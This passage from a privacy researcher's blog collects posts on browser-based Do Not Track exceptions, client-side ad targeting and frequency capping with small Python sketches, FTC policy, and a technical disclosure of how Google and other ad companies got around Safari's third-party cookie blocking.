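print(tracking_preference({"user-agent": "ExampleBrowser/1.0"}))
```

Treating a missing or malformed header as “unset” keeps the absence of a signal distinct from an explicit choice in either direction.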

There are many benefits to managing Do Not Track exceptions through the browser.

Avoids Duplication of Effort. Browser vendors implement an exception mechanism once. Websites can then take advantage of the mechanism with just a few lines of code.
Persistence. A user is unlikely to accidentally clear browser-based exceptions, in contrast to cookies and other out-of-band exception storage mechanisms.²
Centralized Management. Users can adjust all their Do Not Track preferences in one place. Out-of-band exceptions might be scattered across the web.³
Consistent User Interface. The Do Not Track exception user interface will be the same across sites and integrated into the browser’s privacy controls.
Design Quality. Browser vendors employ some of the brightest minds in user interface design.
Usability Incentives. Web browsers compete on usability and frequently iterate with user interface improvements. Browser development teams are, for the most part, incentivized to provide users with adequate information about and control over a Do Not Track exception. A website that seeks a Do Not Track exception, on the other hand, is incentivized to push the boundaries of acceptable notice and choice to get that exception.⁴

In order to better understand the technical challenges associated with browser-based Do Not Track exceptions, I implemented a prototype as a Firefox add-on.

Example exception requests.

A centralized preference management interface.

The source is available on GitHub. I want to emphasize that this is a prototype: it does not conform to the current W3C specification draft and it is insecure, buggy, and slow.

I learned several lessons from the project.

Browser-based exceptions are not very difficult to implement. The Firefox prototype required only a couple days of straightforward development.
Browser-based exceptions are markedly more difficult to implement than the “DNT: 1” header. As a very rough comparison, my reference “DNT: 1” Chrome extension is 9 lines of code, while my prototype Firefox exceptions extension is already 521 lines. Furthermore, implementing “DNT: 1” is largely a systems engineering project, while an exception mechanism necessitates both systems and user interface effort.
The Do Not Track exception user interface is hard to get right. After several iterations, the user interface in my prototype still leaves much room for improvement. I expect Do Not Track will, like other browser features, benefit from long-term user interface evolution.

The prototype add-on validates what Do Not Track proponents have long recognized: Do Not Track is not a crude on/off switch. Rather, it begins a conversation between websites and users about privacy preferences. Browsers will play a central role in facilitating that conversation.

Thanks to Arvind Narayanan for comments on a draft.

1. A number of surveys have reflected mixed consumer preferences on web tracking. See, e.g., Pew Internet 2012, TRUSTe/Harris Interactive 2011, USA Today/Gallup 2010, McDonald and Cranor 2010, and Turow et al. 2009.

2. If a website maintains user accounts, associating an out-of-band exception with an account can greatly reduce the risk of accidental clearing.

3. This problem could be somewhat mitigated with a browser scripting interface for registering an out-of-band exception mechanism. I proposed the approach last year, and there was renewed interest at a recent W3C working group meeting.

4. See Leon et al. 2011 for a usability analysis of current online advertising user control mechanisms.

Tracking Not Required: Behavioral Targeting

jonathan — Mon, 11 Jun 2012 21:42:59 +0000

Original at 33 Bits of Entropy.

Co-authored by Arvind Narayanan and Subodh Iyengar.

In the first installment of the Tracking Not Required series, we discussed a relatively straightforward case: frequency capping. Now let’s get to the 800-pound gorilla, behaviorally targeted advertising, putatively the main driver of online tracking. We will show how to swap a little functionality for a lot of privacy.

Admittedly, implementing behavioral targeting on the client is hard and will require some technical wizardry. It doesn’t come for “free” in that it requires a trade-off in terms of various privacy and deployability desiderata. Fortunately, this has been a fertile topic of research over the past several years, and there are papers describing solutions at a variety of points on the privacy-deployability spectrum. This post will survey these papers, and propose a simplification of the Adnostic approach — along with prototype code — that offers significant privacy and is straightforward to implement.

Goals. Carrying out behavioral advertising without tracking requires several things. First, the user needs to be profiled and categorized based on their browsing history. In nearly all proposed solutions, this happens in the user’s browser. Second, we need an algorithm for selecting targeted ads to display each time the user visits a page. If the profile is stored locally and not shared with the advertising company, this is quite nontrivial. Third, ad impressions and clicks must be reported. This component must also deal with click fraud, impression fraud, and other threats.

Existing approaches

The chart presents an overview of existing and proposed architectures.

“Cookies” refers to the status quo of server-side tracking; all other architectures are presented in research papers summarized in the Do Not Track bibliography page. CoP stands for “Client-only Profiles,” the architecture proposed by Bilenko and Richardson.

Several points of note. First, everything except PrivAd — which uses an anonymizing proxy — reveals the IP address, and typically the User Agent and Referer to the ad company as part of normal HTTP requests. Second, everything except CoP (and the status quo of tracking cookies) requires software installation. Opinions vary on just how much of a barrier this is. Third, we don’t take a stance on whether PrivAd is more deployable than ObliviAd or vice-versa; they both face significant hurdles. Finally, Adnostic can be used in one of two modes, hence it is listed twice.

There is an interesting technological approach, not listed above, that works by exposing more limited referer information. Without the referer header (or an equivalent), the ad server may identify the user but will not learn the first-party URL, and thus will not be able to track. This will be explored in more depth in a future article.

New approach. In the solution we propose here, the server is recruited for profiling, but doesn’t store the profile. This avoids the need for software installation and allows easy deployability. In addition, non-tracking is externally verifiable, to the extent that IP address + User-Agent is not nearly as effective for tracking as cookie-based unique identifiers.[1] Like CoP, and unlike Adnostic, each ad company can only profile users during visits to pages that it has a third-party presence on, rather than all pages.

Profiling algorithm.

1. The user visits a page that has embedded content from the ad company.

2. JavaScript in the ad company’s content sends the top-level URL to a special classifier service run by the ad company. (The classifier is run on a separate domain. It does not have any cookies or other information specific to the user.)

3. The classifier returns a topic classification of the page.

4. The ad company’s JavaScript receives the page classification and uses it to update the user’s behavioral profile in HTML5 storage. The JavaScript may also consider other factors, such as how long the user stayed on the page.

There is a fair degree of flexibility in steps 3 and 4 — essentially any profiling algorithm can be implemented by appropriately splitting it into a server-side component that classifies individual web pages and a client-side component that analyzes the user’s interaction with these pages.
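As a rough illustration of that split, here is a minimal Python sketch of steps 2 through 4. It is a simulation, not our implementation: the `TOPICS_BY_HOST` table, the `classify` function, the `LocalProfile` class, and the time-on-page weighting are all hypothetical stand-ins, and a real deployment would run the client half as JavaScript against HTML5 storage.

```python
from collections import Counter
from urllib.parse import urlsplit

# Hypothetical topic table standing in for the ad company's classifier service.
TOPICS_BY_HOST = {"cars.example": "autos", "recipes.example": "cooking"}

def classify(top_level_url):
    """Server side (step 3): stateless, sees only the URL, never a user identifier."""
    return TOPICS_BY_HOST.get(urlsplit(top_level_url).hostname, "unknown")

class LocalProfile:
    """Client side (step 4): stand-in for a profile kept in HTML5 storage."""

    def __init__(self):
        self.scores = Counter()

    def record_visit(self, topic, seconds_on_page):
        if topic == "unknown":
            return
        # Assumed weighting: longer visits count more, capped at one minute.
        self.scores[topic] += 1.0 + min(seconds_on_page, 60) / 60.0

    def top_interests(self, n=3):
        return [topic for topic, _ in self.scores.most_common(n)]

profile = LocalProfile()
for url, seconds in [("http://cars.example/review", 90),
                     ("http://recipes.example/soup", 5),
                     ("http://cars.example/prices", 30)]:
    profile.record_visit(classify(url), seconds)
print(profile.top_interests(1))  # ['autos']
```

The point of the sketch is the boundary: `classify` never receives anything about the user, and `LocalProfile` never leaves the client.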

Ad serving and accounting.

The ad serving process in our proposal is the same as in Adnostic: the server sends a list of ads along with metadata describing each ad, and the client-side component picks the ad that best matches the locally stored profile. To avoid revealing which ad was displayed, the client can either download all (say, 10) ads in the list while displaying only one, or download only one ad from a separate domain that does not share cookies with the tracking domain. Note the similarity to our frequency capping approach, both in terms of the algorithm and its privacy properties.
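The client-side selection step might look something like the following Python sketch. The ad metadata format (an `id` plus a list of `topics`) and the additive scoring rule are assumptions made for illustration; Adnostic and our prototype may score matches differently.

```python
def pick_ad(ads, profile):
    """Return the ad whose topics best match the locally stored profile.

    ads: list of dicts with 'id' and 'topics' keys (hypothetical metadata format).
    profile: dict mapping topic -> interest score, kept on the client.
    """
    def score(ad):
        return sum(profile.get(topic, 0.0) for topic in ad["topics"])

    # max() keeps the earliest ad on ties, so server ordering breaks ties.
    return max(ads, key=score)

ads = [
    {"id": "a", "topics": ["cooking"]},
    {"id": "b", "topics": ["autos", "travel"]},
]
profile = {"autos": 2.0, "cooking": 0.5}
print(pick_ad(ads, profile)["id"])  # b
```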

Accounting, i.e., billing the right advertiser, is also identical to Adnostic for the cost-per-click and cost-per-impression models; we refer the reader there. Discussion of the cost-per-action model is deferred to a future post.

Implementation. We implemented our behavioral targeting algorithm using HTML 5 local storage. As with our frequency capping implementation, we found performance was exceptionally fast in modern desktop and mobile browsers. For simplicity, our implementation uses a static local database mapping websites to interest segments and a binary threshold for determining interests. In practice, we expect implementers would maintain the mapping server-side and apply more sophisticated logic client-side.

We also present a different work-in-progress implementation that’s broader in scope, encompassing retargeting, behavioral targeting and frequency capping.

Conclusion. Certainly there are costs to our approach — a “thick-client” model will always be slightly more inconvenient to deploy and maintain than a server-based model, and will probably have a lower targeting accuracy. However, we view these costs as minimal compared to the benefits. Some compromise is necessary to get past the current stalemate in web tracking.

Technological feasibility is necessary, but not sufficient, to change the status quo in online tracking. The other key component is incentives. That is why Do Not Track, standards and advocacy are crucial to the online privacy equation.

[1] The engineering and business reasons for this difference in effectiveness will be discussed in a future post.

Tracking Not Required: Frequency Capping

jonathan — Mon, 23 Apr 2012 18:00:18 +0000

Co-authored by Arvind Narayanan.

Debates over web tracking and Do Not Track tend to be framed as a clash between consumer privacy and business need. That’s not quite right. There is, in fact, a spectrum of possible tradeoffs between business interests and consumer privacy.

Our aim with the Tracking Not Required series is to show how those tradeoffs are not at all linear; it is possible to swap a little functionality for a lot of privacy. We only use technologies that are already deployed in browsers, and the solutions we propose are externally verifiable.¹

We focus on issues at the center of Do Not Track negotiations in the World Wide Web Consortium. Advertising companies have pledged to stop forms of ad targeting once a user enables Do Not Track, but many maintain that tracking is essential for a litany of “operational uses.” The Tracking Not Required series demonstrates how business functionality can be implemented without exposing users to the risks of tracking.

This first post addresses frequency capping in online advertising, the most frequently cited “operational use” necessitating tracking.

Background

When an online advertiser places a bid, it often sets a “frequency cap” on how many times a user may see a particular ad or ad campaign. Many advertising companies implement frequency capping with a unique ID cookie; when a user loads an ad, the ad company looks up past ad views using the ID and imposes frequency caps. The ID cookie approach is understandable: frequency capping becomes a straightforward database lookup. But ID cookies come at a significant privacy cost: they enable effective tracking of a user’s browsing activities.

Algorithm

When the browser loads a page, for each ad slot:

1. The advertising company sends a list of ads it is considering for display, including a frequency cap for each ad. The list is ordered by preference.
2. A script iterates through the list. For each ad in the list, the script checks a local ad viewing history to determine whether the ad is frequency capped. It selects the first ad that is uncapped.
3. The script sends the uncapped ad back to the ad company for display or entry into an ad exchange auction.

When an ad is displayed:

1. The script records the impression in the local ad viewing history.
2. The advertising company bills the ad as usual (per impression, per click, per action,² or a hybrid).
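The steps above can be sketched in a few lines. This Python version is a simulation under stated assumptions, not our prototype: `AdViewHistory` stands in for the browser's local storage, and the candidate list format (pairs of ad identifier and cap) is hypothetical.

```python
from collections import Counter

class AdViewHistory:
    """Stand-in for the local ad viewing history kept in the browser."""

    def __init__(self):
        self.views = Counter()

    def is_capped(self, ad_id, cap):
        return self.views[ad_id] >= cap

    def record_impression(self, ad_id):
        self.views[ad_id] += 1

def select_first_uncapped(candidates, history):
    """candidates: preference-ordered (ad_id, frequency_cap) pairs from the ad company.

    Returns the first uncapped ad_id, or None if every candidate is capped.
    Only this single identifier would be sent back to the ad company.
    """
    for ad_id, cap in candidates:
        if not history.is_capped(ad_id, cap):
            return ad_id
    return None

history = AdViewHistory()
candidates = [("shoes", 2), ("phone", 1), ("fallback", 1000)]
shown = []
for _ in range(4):  # four page loads with the same candidate list
    ad_id = select_first_uncapped(candidates, history)
    history.record_impression(ad_id)
    shown.append(ad_id)
print(shown)  # ['shoes', 'shoes', 'phone', 'fallback']
```

The view counts never leave `AdViewHistory`; the server side sees only which ad came back.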

Explanation

Our algorithm leverages several design features to improve the privacy properties of frequency capping.

Client-side storage. The ad company does not store the user’s ad viewing history.
Query-response. Our algorithm shares information only about ads that might be shown, not all ads the user has seen.
Client-side logic. The ad company learns whether certain ads are capped or not; it does not learn their view counts.
Server-side preprocessing. Our algorithm shares only the first uncapped ad, not the capping state of each ad in the list.

Our algorithm protects user privacy by limiting the number of states the browser can be in. When $latex m$ ads are under consideration, our algorithm only allows the browser to be in one of $latex m$ states, since each of the ads might be selected as the first uncapped ad.³ The maximum information entropy contributed is $latex \log_2 m$ bits.⁴ ⁵

The discussion has thus far centered on choosing a single ad. An ad company will often select multiple ads of multiple formats when populating a page. The associated maximum information entropy is $latex \sum_{i=0}^{k}{\log_2{m_i \choose n_i}}$ for a page with $latex k$ ad formats, where $latex m_i$ is the number of ads considered in the $latex i$th format and $latex n_i$ is the number of ads selected in the $latex i$th format.

For a concrete example, consider a New York Times article page, which often features a banner graphical ad, a sidebar graphical ad, and two footer text ads. If there are three ad formats and five possible ads for each format, an ad network that populates all four slots would gain at most 7.97 bits of information entropy from frequency capping. In other words, the ad network cannot learn more about the average user than if it had set a one-character cookie!
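The 7.97 figure can be checked directly from the formula. In this short Python sketch the function name `max_entropy_bits` and the `(m_i, n_i)` pair encoding are ours, chosen for illustration; the three formats are the banner (1 of 5), the sidebar (1 of 5), and the footer text ads (2 of 5).

```python
from math import comb, log2

def max_entropy_bits(formats):
    """formats: list of (m_i, n_i) pairs, ads considered and ads selected per format."""
    return sum(log2(comb(m, n)) for m, n in formats)

# Banner: 1 of 5. Sidebar: 1 of 5. Footer text ads: 2 of 5.
nyt_example = [(5, 1), (5, 1), (5, 2)]
bits = max_entropy_bits(nyt_example)
print(round(bits, 2))  # 7.97
```

That is 5 × 5 × 10 = 250 possible outcomes, just under the 256 values of a single byte.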

Implementation

Several advertising companies have objected that privacy-preserving frequency capping is not feasible in implementation. We respectfully disagree.

Performance is a non-issue. Our algorithm imposes negligible requirements on browser storage⁶ and computation.⁷ As for network latency, the approach would at most require an additional roundtrip–and for the many ad companies that already load an ad over multiple roundtrips, it wouldn’t necessitate any extra roundtrip.

There would, of course, be some software engineering required for implementation. The necessary scripting is straightforward; we developed a prototype implementation of our algorithm in hours. (Source is available on GitHub.) Backend changes may be more demanding; ad companies would have to shift from selecting particular ads for display to generating preference-ordered lists of possible ads. While that work is assuredly not trivial, we do not see how the engineering would be unusually complicated.

1. A website’s compliance with our proposals could be externally verified in a number of ways, such as with an automated auditing tool (e.g. FourthParty), through use of a trusted implementation, or by an independent auditing firm.

2. Privacy-preserving per-action and hybrid billing can be accomplished by querying the impression history in local storage when a billable action occurs.

3. We assume here that at least one ad is uncapped, and we assume in the later discussion that at least $latex n_i$ ads are uncapped. One way to guarantee those assumptions is to designate certain ads as fallbacks. If those assumptions do not hold, the maximum information entropy is $latex \log_2 \left(m+1\right)$ bits for a single format, single ad selection and $latex \sum_{i=0}^{k}{\log_2{\sum_{j=0}^{n_i}{m_i \choose j}}}$ bits for multiple format, multiple ad selection.

4. This property follows from the Gibbs inequality. The information entropy is $latex \log_2 m$ bits only if users are evenly distributed across the state space. Where the state space is dynamic and the distribution of users among states is skewed, both of which are very likely to occur with the approach we propose, the information entropy will be significantly less than $latex \log_2 m$ bits.

5. We analyze our algorithm for marginal privacy impact, that is, the extent to which it makes user privacy worse off. IP address and User-Agent already contribute substantial information entropy and allow tracking many users.

6. For example, if an ad is represented by a 4 byte identifier and frequency count is stored in 1 byte, frequency caps for 100,000 ads consume merely 500 KB. HTML 5 local storage can hold at least 5 MB in the major browsers; Indexed Database and Web SQL can store even more.

7. In our testing, modern browsers can perform dozens of lookups in an HTML 5 local storage instance with over 100,000 keys in mere milliseconds.

Third-Party Web Tracking: Policy and Technology

jonathan — Tue, 13 Mar 2012 12:30:27 +0000

John Mitchell and I have written a new paper that synthesizes research on policy and technology issues surrounding third-party web tracking. It will appear at the IEEE Symposium on Security and Privacy in May.

Abstract

In the early days of the web, content was designed and hosted by a single person, group, or organization. No longer. Webpages are increasingly composed of content from myriad unrelated “third-party” websites in the business of advertising, analytics, social networking, and more. Third-party services have tremendous value: they support free content and facilitate web innovation. But third-party services come at a privacy cost: researchers, civil society organizations, and policymakers have increasingly called attention to how third parties can track a user’s browsing activities across websites.

This paper surveys the current policy debate surrounding third-party web tracking and explains the relevant technology. It also presents the FourthParty web measurement platform and studies we have conducted with it. Our aim is to inform researchers with essential background and tools for contributing to public understanding and policy debates about web tracking.

The FTC’s Chairman Groks Do Not Track

jonathan — Wed, 29 Feb 2012 11:00:20 +0000

Last Thursday the White House hosted a major event on online privacy. Much of the public attention focused on a long-awaited White House report and a commitment by an online advertising self-regulatory group to implement components of the Do Not Track technology. Both the Electronic Frontier Foundation and the Center for Democracy and Technology have written detailed reviews of what transpired.

There has been scant focus on Federal Trade Commission Chairman Jon Leibowitz’s brief remarks on Do Not Track. That’s a mistake.

The FTC was an early, vocal proponent of Do Not Track with its December 2010 preliminary staff report on online privacy. FTC staff have frequently cajoled companies and trade groups to implement Do Not Track, and they have participated in every meeting of the World Wide Web Consortium’s Do Not Track working group. Chairman Leibowitz himself attended a recent meeting in Brussels.

The FTC’s thinking matters. The agency can—and does—bring enforcement actions against web trackers (e.g. Chitika, ScanScout) and the websites that facilitate them (e.g. Facebook). The FTC can call for Do Not Track legislation. Further, under the new White House proposal, the agency would be vested with both veto power over self-regulatory codes and enforcement authority for baseline privacy requirements.

FTC commissioners tend to shy away from staking out their individual policy views. The FTC is a law enforcement agency, and it only “speaks” through a vote of the commission. Chairman Leibowitz in particular has relied on subtlety and nuance in his policy addresses.

Last Thursday’s speech was unusually direct. Chairman Leibowitz gave the clearest articulation yet of his thinking on Do Not Track—and he got it completely right. Here’s a summary.

The FTC does policy, not just enforcement. And it’s the agency that will continue to lead on Do Not Track, not the White House or the Commerce Department.

Since our founding in 1914, the FTC also has had a policy function, which has focused recently on privacy.

With the encouragement of this Administration – which has so keenly recognized the link between protecting consumer privacy online and engendering consumer trust in Internet commerce – an impressive public-private partnership has made a beginning, coming together around one small agency’s Do Not Track initiative.

A consumer’s Do Not Track preference must do more than stop behavioral ad targeting.

We envisioned a [Do Not Track] mechanism that would . . . allow consumers to limit how much data is gathered about them online (and not just how many targeted ads they see) . . . .

At present, online advertising self-regulation only stops behavioral ad targeting. (Some stakeholders have termed the program “Do Not Target.”)

For the past several years, the online advertising industry has been working to develop an icon that consumers could click to opt out of receiving targeted ads.

A consumer’s Do Not Track preference must affect all third-party websites, including advertising companies, analytics services, and social networks.

While these developments are encouraging, we still need to ensure that all companies that track users – not just advertisers – are at the table.

The World Wide Web Consortium is the multi-stakeholder forum for establishing Do Not Track technology and policy.

To that end, the World Wide Web Consortium (W3C), an Internet standards-setting body, gathered engineers, consumer groups, and participants across the broad technology industry to create a universal standard for Do Not Track. We look forward to their deliberations also bearing fruit over the coming year.

The FTC will continue to enforce on web tracking issues, especially when a company violates a consent order with the agency.

Today, although it is still a work in progress, the ad industry has obtained buy-in from companies that deliver 90 percent of online behavioral advertisements; and, with the Better Business Bureau, it has established a mechanism with teeth to address non-compliance, backed up with FTC enforcement. Said differently, if they don’t enforce it, we will.

Most notably, last year, two of the largest Internet companies entered into consent orders with the FTC that require both to honor their privacy commitments to hundreds of millions of consumers worldwide and to hire outside auditors to monitor their privacy practices.

The Do Not Track technology is the “DNT: 1” preference signaling mechanism, and consumers are already using it. Microsoft’s Tracking Protection List technology has merit, but it’s a different proposal.

In a related effort, very early on the companies that make web browsers stepped up to our challenge to give consumers choice about how they are tracked online, sometimes known as the browser header approach. Just after the FTC’s call for Do Not Track, Microsoft developed a system to let users of Internet Explorer prevent tracking by different companies and sites. Mozilla introduced a Do Not Track privacy control for its Firefox browser that an impressive number of consumers have adopted; Apple included a similar Do Not Track control in Safari.

Implications

European policymakers have already articulated their positions on advertising self-regulation and Do Not Track. In December the European Union’s Data Protection Working Party issued a formal opinion that found current advertising self-regulation inadequate under EU privacy law and that signaled support for the W3C’s Do Not Track standards process. European Commission Vice-President Neelie Kroes indicated in January that she shares those views; she reaffirmed her position in response to last week’s event.

Now the head of the chief U.S. consumer protection agency has chimed in, and he agrees. The FTC’s upcoming report on consumer privacy online will clarify where the other commissioners stand.

There is an increasingly clear transatlantic consensus: online advertising self-regulation is not enough. The W3C’s Do Not Track standards process is the way forward for providing meaningful consumer choice about third-party web tracking.

Thanks to Ashkan Soltani, Chris Soghoian, and ★★★★★ for conversations that informed this post. Thanks also to Lee Tien for input on a draft. All views, especially wrong ones, are my own.

Setting the Record Straight on Google’s Safari Tracking

jonathan — Tue, 21 Feb 2012 05:52:46 +0000

Our recent research on Google’s circumvention of the Safari cookie blocking feature has led to some confusion, in part owing to the company’s statement in response (reproduced in its entirety below). This post is an attempt to elucidate the central issues. As with the original writeup, I aim for a neutral viewpoint in the interest of establishing a common factual understanding.

To begin, I’d like to lend some structure to ongoing policy discussions by unpacking the four business practices that are at issue.

Social advertising. Google is leveraging user account information to personalize its advertising on non-Google websites. To do that, Google now identifies its users when they view ads on non-Google websites.

Social advertising circumvention. Google intentionally bypassed Safari’s cookie blocking feature to place an identifying cookie that it uses for social advertising.

Ordinary advertising circumvention. Google’s social circumvention had a collateral effect: it enabled Google to place its ordinary advertising tracking cookie.

Representation. A Google instructional webpage claimed that Safari’s cookie blocking feature “effectively accomplishes the same thing” as opting out of Google’s advertising cookies.

Safari Advertising Cookie Opt-Out Instructions

I’d next like to clarify some key points about our findings.

No account, login, or user preference was required for circumvention. The circumvention behaviors affected all users, independent of whether they had a Google account, were logged into a Google account, or had made a choice about social advertising.

Identifying and identifiable information was collected. Google’s social advertising technology is designed to identify the user—that’s how it shows your friends’ pictures! Google’s design document provides additional detail on the feature. For discussion of how third-party web tracking is in general not anonymous, see Arvind Narayanan‘s explanation “There is no such thing as anonymous web tracking” and our research on identifying information leakage.

Circumvention is not a commonly accepted business practice. We only identified four advertising companies that deployed technology for circumventing Safari’s cookie blocking, and all have since stopped the practice. Furthermore, a self-regulatory organization for the online advertising industry cites Safari’s cookie blocking feature as a way to stop cookies from advertising companies: “[Safari’s] default setting will block all third-party cookies, including those of our member ad networks and those of other, non-member ad networks.”

Apple’s intent was to block advertising-related tracking. The language in Safari’s preferences menu, Apple’s promotional materials, and developer discussions all indicate that advertising-related tracking was a central motivation for the cookie blocking feature.

Apple’s purpose was not messing with Google. The default cookie blocking feature that Google circumvented was implemented in Safari 1.0, which shipped in 2003—long before Google was in the third-party display advertising business, and long before relations between the companies soured over smartphones. Furthermore, Safari has repeatedly been a pioneer in browser privacy. Safari 1.0 included a simple “privacy reset” choice for clearing browser settings; the other major browsers followed with similar features. Safari 2.0, released in 2005, was the first browser to provide a “private browsing” mode; again, all the other major browsers followed.

No +1 button was visible on circumvention ads. We never saw an ad with the +1 button in our testing. The circumvention behaviors occurred in ordinary-looking ads. In the special case of YouTube’s homepage, there was no visible ad at all.

Circumvention was not needed for social sharing. Google’s circumvention was not necessary to make the +1 button clickable. (For the geeks in the audience: Google could have trivially routed clicks through google.com.) The circumvention was only needed¹ to personalize ads—for example, to show friends’ pictures near the +1 button, or in future to target ads based on Google+ social networking data.

Users likely did not understand their social advertising setting. New users are by default opted into social advertising on signup.

Social Advertising Default on Account Signup

My understanding is that users with accounts predating the +1 button have social advertising disabled, but are eventually prompted about the setting with “Enable” selected by default. Disabling the feature requires going to Accounts → Google+, locating the buried “+1 on non-Google sites” setting, then toggling it to “Disable”. Google’s description of the feature does not clearly communicate that it allows Google to identify the user on non-Google websites. The description also does not indicate that the feature would override a browser privacy setting.

Social Advertising Opt-Out Location

Social Advertising Opt-Out Page

Google’s circumvention only affected Google services. It did not allow other advertising companies to track the user.

Finally, I’d like to note a couple of questions that remain open for Google.

Users impacted. Our measurement data suggests a great number of Safari users may have been affected by Google’s circumvention. Google has not yet indicated how many users were impacted.

Profit. Google held an advantage over its advertising competitors that did not track Safari browsers. That advantage may have resulted in profit. Google has not yet publicized an estimate of its income from tracking Safari browsers.

Google circulated the following statement to media outlets and policymakers on Friday. The company did not post the statement on its website, and my understanding is that Google representatives declined to answer questions about the statement.

The Journal mischaracterizes what happened and why. We used known Safari functionality to provide features that signed-in Google users had enabled. It’s important to stress that these advertising cookies do not collect personal information.

Unlike other major browsers, Apple’s Safari browser blocks third-party cookies by default. However, Safari enables many web features for its users that rely on third parties and third-party cookies, such as “Like” buttons. Last year, we began using this functionality to enable features for signed-in Google users on Safari who had opted to see personalized ads and other content–such as the ability to “+1” things that interest them.

To enable these features, we created a temporary communication link between Safari browsers and Google’s servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalization. But we designed this so that the information passing between the user’s Safari browser and Google’s servers was anonymous–effectively creating a barrier between their personal information and the web content they browse.

However, the Safari browser contained functionality that then enabled other Google advertising cookies to be set on the browser. We didn’t anticipate that this would happen, and we have now started removing these advertising cookies from Safari browsers. It’s important to stress that, just as on other browsers, these advertising cookies do not collect personal information.

Users of Internet Explorer, Firefox and Chrome were not affected. Nor were users of any browser (including Safari) who have opted out of our interest-based advertising program using Google’s Ads Preferences Manager.

Thanks to Arvind Narayanan, Ashkan Soltani, Lee Tien, and ★★★★★ for valuable input.

1. This discussion presumes Google would host its social advertising from doubleclick.net instead of google.com. If Google had hosted social advertising from google.com, there would have been no need to circumvent Safari’s cookie blocking.

Safari Trackers

jonathan — Fri, 17 Feb 2012 10:30:13 +0000

Apple’s Safari web browser is configured to block third-party cookies by default. We identified four advertising companies that unexpectedly place trackable cookies in Safari. Google and Vibrant Media intentionally circumvent Safari’s privacy feature. Media Innovation Group and PointRoll serve scripts that appear to be derived from circumvention example code.

In the interest of clearly establishing facts on the ground, this post provides technical analysis of Safari’s cookie blocking feature and the four companies’ practices. It does not address policy or legal issues. (More on that soon.)

Before proceeding further, I want to thank the countless friends and colleagues who provided invaluable feedback on this project. In particular: ★★★★★, whose insights have been vital at every step, and Ashkan Soltani, whose crawling data was instrumental in uncovering PointRoll’s practices and understanding the prevalence of cookie blocking circumvention.

Third-Party Cookie Blocking in Safari

Every popular web browser, save Opera Mini and the Android built-in browser, includes a “third-party cookie blocking” privacy feature. (The remainder of this post uses the term “cookie blocking” for brevity.) These options share a common high-level purpose: impose limits on cookies from “third-party domains,” that is, domains that differ from the “first-party domain” in the browser’s URL bar. In practice, however, implementations vary substantially; for (slightly out-of-date) specifics, see the Center for Democracy and Technology’s 2010 Browser Privacy Features report and Google’s Browser Security Handbook.

Safari’s cookie blocking feature is unique in two ways: its default and its substantive policy.

Unlike every other browser vendor, Apple enables cookie blocking by default. Every iPhone, iPad, iPod Touch, and Mac ships with the privacy feature turned on.

Default Privacy Settings in Desktop Safari

Default Privacy Settings in iPhone and iPad Safari

Apple advertises cookie blocking by default as a benefit of choosing Safari.

Some companies track the cookies generated by the websites you visit, so they can gather and sell information about your web activity. Safari is the first browser that blocks these tracking cookies by default, better protecting your privacy. Safari accepts cookies only from the current domain.

Apple’s cookie blocking policy is less restrictive than many competing browser vendors’.¹

Reading Cookies. Safari allows third-party domains to read cookies.

Modifying Cookies. If an HTTP request to a third-party domain includes a cookie, Safari allows the response to write cookies.

Form Submission. If an HTTP request to a third-party domain is caused by the submission of an HTML form, Safari allows the response to write cookies. This component of the policy was removed from WebKit, the open source browser engine behind Safari, seven months ago by Google engineers. Their rationale is not public; the bug is marked as a security problem. The change has not yet landed in Safari.
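The write side of the policy, as described above, can be modeled as a small decision function. This Python sketch is a simplification and not Safari's code: the `Request` fields are hypothetical, and the exact string comparison of domains glosses over how a real browser decides that two hostnames belong to the same site.

```python
from dataclasses import dataclass

@dataclass
class Request:
    first_party_domain: str     # domain shown in the browser's URL bar
    target_domain: str          # domain the HTTP request is sent to
    sends_cookie: bool          # request already carries a cookie for target_domain
    from_form_submission: bool  # request was caused by submitting an HTML form

def response_may_write_cookies(req):
    """Model of the allowances described above (simplified domain matching)."""
    if req.target_domain == req.first_party_domain:
        return True  # first-party responses are not restricted
    # Third-party responses may write cookies only under the two allowances.
    return req.sends_cookie or req.from_form_submission

plain = Request("news.example", "ads.example", False, False)
form = Request("news.example", "ads.example", False, True)
print(response_may_write_cookies(plain), response_may_write_cookies(form))  # False True
```

Once the form allowance has let a first cookie through, every later request carries it, so the cookie-modification allowance applies from then on.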

These allowances in the Safari cookie blocking policy enable three potentially undesirable behaviors by advertising networks, analytics services, social widgets, and other “third-party websites.”

If a company operates both a first-party website and a third-party website from the same domain, visitors to the first-party website will be open to cookie-based tracking by the third-party service. Yahoo! is an example: it hosts both first-party websites and third-party advertising services on the yahoo.com domain.

If a third-party website’s content ever manages to load in a full browser window, the website can set cookies on its domain. An advertising company, for example, could set tracking cookies on its domain with a pop-up, pop-under, or temporary redirect (e.g. when a user clicks an ad).

A third-party website can use JavaScript to submit a form in an iframe without user interaction.

This post focuses on the last behavior. We discovered four advertising companies that surreptitiously submit a form in an invisible iframe and place trackable cookies in Safari: Google, Vibrant Media, Media Innovation Group, and PointRoll. The balance of the post details each company’s business practices.

Google

Google has, historically, operated most of its first-party websites on the google.com domain and most of its third-party services on other domains. For example: Google Analytics is served from google-analytics.com, Google software libraries are hosted at googleapis.com, Google static content is at gstatic.com, and Google’s advertising services are on doubleclick.net.

Separating first-party websites from third-party services improves security: interactions between google.com content and other websites could introduce vulnerabilities. The domain separation also benefits user privacy: Google associates user account information with google.com cookies. By serving its third-party services from other domains, Google ensures it will not receive google.com cookies, and therefore will not be able to trivially identify user activities on other websites.

But what about when Google does want to identify the user on a non-Google website? Social personalization requires² just that! Google has two design options.

First, Google could embed google.com content on non-Google websites. This is the approach it has taken with its social sharing widgets; both the (defunct) Buzz button and the +1 button load resources from google.com.

Second, Google could synchronize information from its google.com domain to another domain, a process called “cookie syncing” in online advertising lingo. This is the approach Google took with youtube.com after it acquired YouTube. And this is the approach Google settled on for social personalization of doubleclick.net display advertising. Google announced the +1 button for display ads last September; here are the steps in the underlying cookie syncing technology, based on conversations with Googlers and an explanatory document that Google provided.

A display advertisement includes the cookie syncing mechanism’s iframe, located at http://googleads.g.doubleclick.net/pagead/drt/s. We observed the iframe load in both desktop and mobile display ads. Here are example ads that included the mechanism, from the Washington Post (Safari on Mac OS X) and MSNBC (Safari on iPhone).

Google Ads Including the google.com → doubleclick.net Cookie Syncing Mechanism

We also saw what appeared to be a special use of the mechanism on youtube.com, where Google placed an invisible advertisement in the footer that included the cookie syncing iframe.

